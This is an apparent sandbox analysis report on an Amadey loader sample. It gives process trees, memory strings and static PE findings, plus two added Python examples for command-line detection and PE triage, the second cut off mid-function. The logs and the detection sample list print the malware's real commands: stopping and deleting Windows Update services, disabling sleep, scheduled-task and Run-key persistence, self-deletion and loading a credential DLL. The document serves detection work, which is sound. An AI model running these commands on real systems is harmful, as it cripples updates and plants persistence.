Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qgoyddbo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'RtkAudUService64.exe' /tr '''C:\Users\user\Locktime\RtkAudUService64.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe' }
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Process created: unknown unknown
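The process tree above is a compact test corpus for command-line detection: the loader self-deletes through cmd/timeout/del, persists with a one-minute schtasks interval, locks down its own file and folder with CACLS, loads cred64.dll through rundll32 by export name, and Emit64.exe stops and deletes the Windows Update services, zeroes every power timeout, and branches on IsInRole(Administrator) between a highest-run-level logon task and an HKCU Run key. The Python below is an added example written for this page, not Joe Sandbox's or the malware's code. SAMPLE_EVENTS is constructed from the report's "Process created" lines (the PowerShell one abridged, as marked) plus two constructed benign lines, and the rule labels are the example's own names, not Joe Sandbox signature names.

```python
"""Command-line rules for the process tree in this report. Added example for
this page (not Joe Sandbox or malware code). SAMPLE_EVENTS is constructed from
the report's "Process created" lines, one abridged, plus two benign lines."""
import re

# Windows Update / delivery services the loader stops and then deletes.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}
SERVICES_KEY = re.escape("hklm\\system\\currentcontrolset\\services\\")
RUN_KEY = re.escape("hkcu\\software\\microsoft\\windows\\currentversion\\run")


def classify(cmdline: str) -> set[str]:
    """Return the rule labels a single command line triggers (empty set if none)."""
    low = cmdline.lower()
    tags = set()
    # Defence evasion: stop the update services, then delete their service keys.
    for m in re.finditer(r"\bsc(?:\.exe)?\s+stop\s+(\w+)", low):
        if m.group(1) in UPDATE_SERVICES:
            tags.add("update_service_stopped")
    for m in re.finditer(r'reg(?:\.exe)?\s+delete\s+"?' + SERVICES_KEY + r"(\w+)", low):
        if m.group(1) in UPDATE_SERVICES:
            tags.add("update_service_key_deleted")
    # powercfg zeroing every sleep/hibernate timeout keeps the host awake for the payloads.
    if re.search(r"powercfg(?:\.exe)?\s+/x\s+-(?:hibernate|standby)-timeout-(?:ac|dc)\s+0\b", low):
        tags.add("sleep_hibernate_disabled")
    # Persistence: a task that re-runs the loader every minute.
    if re.search(r'schtasks(?:\.exe)?"?\s+/create\b.*/sc\s+minute\s+/mo\s+1\b', low):
        tags.add("minute_interval_task")
    # Logon task at highest run level, via schtasks or the ScheduledTasks module.
    if (re.search(r'schtasks(?:\.exe)?"?\s+/create\b.*/sc\s+onlogon\b.*/rl\s+highest', low)
            or re.search(r"register-scheduledtask.*-runlevel\s+'?highest'?", low)):
        tags.add("logon_task_highest")
    # Fallback persistence when not elevated: HKCU Run key.
    if re.search(r'reg(?:\.exe)?\s+add\s+"?' + RUN_KEY, low):
        tags.add("run_key_persistence")
    # Branching on IsInRole(Administrator) before choosing a persistence method.
    if "isinrole(" in low and "administrator" in low:
        tags.add("admin_check_branch")
    # CACLS ... /P "user:N" strips the user's own rights from the dropped file/folder.
    if re.search(r'cacls(?:\.exe)?\s+"[^"]+"\s+/p\s+"[^"]+:n"', low):
        tags.add("self_acl_lockdown")
    # timeout ... & del /f /q <path>: delete the original dropper after a delay.
    if re.search(r"timeout\s+/t\s+\d+\s*&\s*del\s+/[fq]", low):
        tags.add("self_delete")
    # rundll32 loading a DLL from the user profile by a named export (cred64.dll, Main).
    if re.search(r'rundll32(?:\.exe)?"?\s+c:\\users\\[^,\s]+\.dll\s*,\s*\w+', low):
        tags.add("rundll32_user_profile_dll")
    return tags


def scan(events: list[dict]) -> list[dict]:
    """Return only the events that triggered a rule, each with its sorted tag list."""
    hits = []
    for ev in events:
        tags = classify(ev["cmdline"])
        if tags:
            hits.append({**ev, "tags": sorted(tags)})
    return hits


# Constructed from the report's process tree (image name, command line).
SAMPLE_EVENTS = [
    {"image": "cmd.exe", "cmdline": r'"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\DQxttu2Qrr.exe" & exit'},
    {"image": "schtasks.exe", "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F'},
    {"image": "cacls.exe", "cmdline": r'CACLS "gntuud.exe" /P "user:N"'},
    {"image": "rundll32.exe", "cmdline": r'"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main'},
    {"image": "cmd.exe", "cmdline": r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f'},
    {"image": "cmd.exe", "cmdline": r"C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0"},
    # Abridged: the OS-version branch and task settings are dropped; the logic is the report's.
    {"image": "powershell.exe", "cmdline": r"""powershell.exe IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Locktime\RtkAudUService64.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -TaskName 'RtkAudUService64.exe' -RunLevel 'Highest' -Force } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "RtkAudUService64.exe" /t REG_SZ /f /d 'C:\Users\user\Locktime\RtkAudUService64.exe' }"""},
    # Two constructed benign lines to show the rules do not fire on them.
    {"image": "conhost.exe", "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"image": "sc.exe", "cmdline": "sc stop Spooler"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["image"], "->", ", ".join(hit["tags"]))
```

The rules key on the parent's full chained command line as well as on the individual child processes, because the sandbox records both (cmd.exe /c sc stop ... and the separate sc.exe sc stop ... lines). In a real pipeline the same classify() can be fed Sysmon Event ID 1 or Security 4688 CommandLine fields; the update-service rules are deliberately restricted to the five service names so that ordinary sc stop on other services does not fire.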
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\ProgramData\61312899942613011832.exe File created: C:\Users\user\AppData\Local\Temp\03bd543fce
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331294538.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3076:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5604:120:WilError_01
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\118b2709b7d16171ccdcf59ab82ccd18
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5920:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5248:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Mutant created: \Sessions\1\BaseNamedObjects\c33e9ad058e5d380869687d885c0668c
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\umciavi32[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe, type: DROPPED
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: DQxttu2Qrr.exe Static file information: File size 7387352 > 1048576
Source: DQxttu2Qrr.exe Static PE information: Raw size of .rrt02 (0x704c00) exceeds 0x100000
Source: DQxttu2Qrr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Carafej mamib cemike\xiwati\Dedexaj wahiraje\jeweyohe kajexef.pdb source: umciavi64.exe, 00000031.00000002.647446249.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp, umciavi64.exe, 00000031.00000000.425031565.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Code function: 26_3_000001830AEE3027 push es; ret 26_3_000001830AEE3152
Source: DQxttu2Qrr.exe Static PE information: section name: .rrt00
Source: DQxttu2Qrr.exe Static PE information: section name: .rrt01
Source: DQxttu2Qrr.exe Static PE information: section name: .rrt02
Source: 61312899942613011832.exe.0.dr Static PE information: section name: lB@dO\ih
Source: 61312899942613011832.exe.0.dr Static PE information: section name: Fh?jG[OJ
Source: 61312899942613011832.exe.0.dr Static PE information: section name: qNR5:WbS
Source: 61312899942613011832.exe.0.dr Static PE information: section name: z?fd8ijJ
Source: 61312899942613011832.exe.0.dr Static PE information: section name: CV?7x>JO
Source: 61312899942613011832.exe.0.dr Static PE information: section name: EVjKc_MI
Source: 61312899942613011832.exe.0.dr Static PE information: section name: dT<:EHzj
Source: 61312899942613011832.exe.0.dr Static PE information: section name: @]topACL
Source: nppshell[1].exe.0.dr Static PE information: section name: lB@dO\ih
Source: nppshell[1].exe.0.dr Static PE information: section name: Fh?jG[OJ
Source: nppshell[1].exe.0.dr Static PE information: section name: qNR5:WbS
Source: nppshell[1].exe.0.dr Static PE information: section name: z?fd8ijJ
Source: nppshell[1].exe.0.dr Static PE information: section name: CV?7x>JO
Source: nppshell[1].exe.0.dr Static PE information: section name: EVjKc_MI
Source: nppshell[1].exe.0.dr Static PE information: section name: dT<:EHzj
Source: nppshell[1].exe.0.dr Static PE information: section name: @]topACL
Source: gntuud.exe.4.dr Static PE information: section name: lB@dO\ih
Source: gntuud.exe.4.dr Static PE information: section name: Fh?jG[OJ
Source: gntuud.exe.4.dr Static PE information: section name: qNR5:WbS
Source: gntuud.exe.4.dr Static PE information: section name: z?fd8ijJ
Source: gntuud.exe.4.dr Static PE information: section name: CV?7x>JO
Source: gntuud.exe.4.dr Static PE information: section name: EVjKc_MI
Source: gntuud.exe.4.dr Static PE information: section name: dT<:EHzj
Source: gntuud.exe.4.dr Static PE information: section name: @]topACL
Source: syncfiles[1].dll.13.dr Static PE information: section name: *;>%1sXO
Source: syncfiles[1].dll.13.dr Static PE information: section name: 7rP!Ni:j
Source: syncfiles[1].dll.13.dr Static PE information: section name: bkE<E2?8
Source: syncfiles[1].dll.13.dr Static PE information: section name: 8*7`Joyq
Source: syncfiles[1].dll.13.dr Static PE information: section name: 0Ys'"rSd
Source: syncfiles[1].dll.13.dr Static PE information: section name: nUPwRZiK
Source: syncfiles[1].dll.13.dr Static PE information: section name: $u!6XeN&
Source: syncfiles[1].dll.13.dr Static PE information: section name: K)'tLNvc
Source: syncfiles.dll.13.dr Static PE information: section name: *;>%1sXO
Source: syncfiles.dll.13.dr Static PE information: section name: 7rP!Ni:j
Source: syncfiles.dll.13.dr Static PE information: section name: bkE<E2?8
Source: syncfiles.dll.13.dr Static PE information: section name: 8*7`Joyq
Source: syncfiles.dll.13.dr Static PE information: section name: 0Ys'"rSd
Source: syncfiles.dll.13.dr Static PE information: section name: nUPwRZiK
Source: syncfiles.dll.13.dr Static PE information: section name: $u!6XeN&
Source: syncfiles.dll.13.dr Static PE information: section name: K)'tLNvc
Source: cred64[1].dll.13.dr Static PE information: section name: f5g\gWe7
Source: cred64[1].dll.13.dr Static PE information: section name: zDthL)*@
Source: cred64[1].dll.13.dr Static PE information: section name: nb"h!m#Y
Source: cred64[1].dll.13.dr Static PE information: section name: $^+<%+dU
Source: cred64[1].dll.13.dr Static PE information: section name: Z-),j99t
Source: cred64[1].dll.13.dr Static PE information: section name: 8"ikKHD[
Source: cred64[1].dll.13.dr Static PE information: section name: k&l<0?<6
Source: cred64[1].dll.13.dr Static PE information: section name: n[uZh3ex
Source: cred64[1].dll.13.dr Static PE information: section name: Uh%r6i!H
Source: cred64.dll.13.dr Static PE information: section name: f5g\gWe7
Source: cred64.dll.13.dr Static PE information: section name: zDthL)*@
Source: cred64.dll.13.dr Static PE information: section name: nb"h!m#Y
Source: cred64.dll.13.dr Static PE information: section name: $^+<%+dU
Source: cred64.dll.13.dr Static PE information: section name: Z-),j99t
Source: cred64.dll.13.dr Static PE information: section name: 8"ikKHD[
Source: cred64.dll.13.dr Static PE information: section name: k&l<0?<6
Source: cred64.dll.13.dr Static PE information: section name: n[uZh3ex
Source: cred64.dll.13.dr Static PE information: section name: Uh%r6i!H
Source: Emit64[1].exe.13.dr Static PE information: section name: 87*qGv;7
Source: Emit64[1].exe.13.dr Static PE information: section name: ^NsFAbb[
Source: Emit64[1].exe.13.dr Static PE information: section name: 4.ps1S["
Source: Emit64[1].exe.13.dr Static PE information: section name: l^D/X#s1
Source: Emit64[1].exe.13.dr Static PE information: section name: aAyXB94]
Source: Emit64[1].exe.13.dr Static PE information: section name: n9Mms2uS
Source: Emit64[1].exe.13.dr Static PE information: section name: 7u=]29J1
Source: Emit64[1].exe.13.dr Static PE information: section name: *<5LK<h`
Source: Emit64[1].exe.13.dr Static PE information: section name: Ug$Va';z
Source: Emit64[1].exe.13.dr Static PE information: section name: dA:<*dF(
Source: Emit64[1].exe.13.dr Static PE information: section name: r,Ht]nHV
Source: Emit64[1].exe.13.dr Static PE information: section name: m$m2M1,9
Source: Emit64[1].exe.13.dr Static PE information: section name: o?%]P5Wl
Source: Emit64[1].exe.13.dr Static PE information: section name: lNMkoK?T
Source: Emit64.exe.13.dr Static PE information: section name: 87*qGv;7
Source: Emit64.exe.13.dr Static PE information: section name: ^NsFAbb[
Source: Emit64.exe.13.dr Static PE information: section name: 4.ps1S["
Source: Emit64.exe.13.dr Static PE information: section name: l^D/X#s1
Source: Emit64.exe.13.dr Static PE information: section name: aAyXB94]
Source: Emit64.exe.13.dr Static PE information: section name: n9Mms2uS
Source: Emit64.exe.13.dr Static PE information: section name: 7u=]29J1
Source: Emit64.exe.13.dr Static PE information: section name: *<5LK<h`
Source: Emit64.exe.13.dr Static PE information: section name: Ug$Va';z
Source: Emit64.exe.13.dr Static PE information: section name: dA:<*dF(
Source: Emit64.exe.13.dr Static PE information: section name: r,Ht]nHV
Source: Emit64.exe.13.dr Static PE information: section name: m$m2M1,9
Source: Emit64.exe.13.dr Static PE information: section name: o?%]P5Wl
Source: Emit64.exe.13.dr Static PE information: section name: lNMkoK?T
Source: avicapn32[1].exe.13.dr Static PE information: section name: .n3DK0
Source: avicapn32[1].exe.13.dr Static PE information: section name: .symtab
Source: avicapn32[1].exe.13.dr Static PE information: section name: .n3DK1
Source: avicapn32[1].exe.13.dr Static PE information: section name: .n3DK2
Source: avicapn32[1].exe.13.dr Static PE information: section name: .n3DK3
Source: avicapn32.exe.13.dr Static PE information: section name: .n3DK0
Source: avicapn32.exe.13.dr Static PE information: section name: .symtab
Source: avicapn32.exe.13.dr Static PE information: section name: .n3DK1
Source: avicapn32.exe.13.dr Static PE information: section name: .n3DK2
Source: avicapn32.exe.13.dr Static PE information: section name: .n3DK3
Source: RtkAudUService64.exe.26.dr Static PE information: section name: 87*qGv;7
Source: RtkAudUService64.exe.26.dr Static PE information: section name: ^NsFAbb[
Source: RtkAudUService64.exe.26.dr Static PE information: section name: 4.ps1S["
Source: RtkAudUService64.exe.26.dr Static PE information: section name: l^D/X#s1
Source: RtkAudUService64.exe.26.dr Static PE information: section name: aAyXB94]
Source: RtkAudUService64.exe.26.dr Static PE information: section name: n9Mms2uS
Source: RtkAudUService64.exe.26.dr Static PE information: section name: 7u=]29J1
Source: RtkAudUService64.exe.26.dr Static PE information: section name: *<5LK<h`
Source: RtkAudUService64.exe.26.dr Static PE information: section name: Ug$Va';z
Source: RtkAudUService64.exe.26.dr Static PE information: section name: dA:<*dF(
Source: RtkAudUService64.exe.26.dr Static PE information: section name: r,Ht]nHV
Source: RtkAudUService64.exe.26.dr Static PE information: section name: m$m2M1,9
Source: RtkAudUService64.exe.26.dr Static PE information: section name: o?%]P5Wl
Source: RtkAudUService64.exe.26.dr Static PE information: section name: lNMkoK?T
Source: initial sample Static PE information: section where entry point is pointing to: .rrt02
Source: umciavi32.exe.13.dr Static PE information: real checksum: 0x2f4f7 should be: 0x1a069f
Source: umciavi32[1].exe.13.dr Static PE information: real checksum: 0x2f4f7 should be: 0x1a069f
Source: jekppnay.tmp.26.dr Static PE information: real checksum: 0x0 should be: 0x2ec3f
Source: advapi32.dll.49.dr Static PE information: real checksum: 0x0 should be: 0x4a7fc
Source: initial sample Static PE information: section name: .text entropy: 7.996278983729512
Source: initial sample Static PE information: section name: .text entropy: 7.996278983729512
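The static lines above (section names made of special characters, the entry point sitting in .rrt02, a .text entropy of 7.996, stored checksums that do not match the file) are checks a triage script can reproduce from the PE headers alone. What follows is an added example, not code from this report or from Joe Sandbox: a header-only PE parser with section-name, entropy, entry-point and checksum checks. The small PE32 image it builds for itself is constructed test input, not a real binary; the entropy threshold of 7.5 and the allowed section-name alphabet are assumptions of the example.

```python
import math
import struct

# Assumption: the characters a linker normally puts in a section name.
SECTION_NAME_OK = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$-")


def entropy(data):
    """Shannon entropy in bits per byte: 0.0 for empty or constant data, 8.0 at most."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(data, checksum_offset):
    """PE checksum as the loader computes it: fold every 32-bit word (skipping the
    CheckSum field itself) with end-around carry down to 16 bits, then add the file length."""
    assert checksum_offset % 4 == 0
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data):
    """Read just enough of the headers: entry point RVA, CheckSum and the section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                    # optional header; PE32 and PE32+ agree up to CheckSum
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    checksum_off = opt + 64
    sections = []
    for i in range(nsections):
        name, vsize, vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append(dict(name=name.rstrip(b"\0").decode("latin-1"), vaddr=vaddr,
                             vsize=vsize, raw=data[rawptr:rawptr + rawsize]))
    return dict(entry_rva=entry_rva, checksum_off=checksum_off,
                stored_checksum=struct.unpack_from("<I", data, checksum_off)[0], sections=sections)


def triage_pe(data, entropy_threshold=7.5):
    """Return the same kind of findings the report lists under 'Static PE information'."""
    pe = parse_pe(data)
    findings = []
    for s in pe["sections"]:
        if any(ch not in SECTION_NAME_OK for ch in s["name"]):
            findings.append(f"section name with special chars: {s['name']!r}")
        h = entropy(s["raw"])
        if h >= entropy_threshold:
            findings.append(f"high entropy in {s['name']!r}: {h:.3f}")
        if s["vaddr"] <= pe["entry_rva"] < s["vaddr"] + max(s["vsize"], len(s["raw"])):
            findings.append(f"entry point in section {s['name']!r}")
    expected = pe_checksum(data, pe["checksum_off"])
    if pe["stored_checksum"] != expected:
        findings.append(f"checksum mismatch: stored {pe['stored_checksum']:#x}, computed {expected:#x}")
    return findings


def build_test_pe(sections, entry_rva, checksum=0):
    """Constructed PE32 image for testing: valid headers plus raw sections, no real code."""
    e_lfanew, opt_size, file_align = 0x40, 224, 0x200
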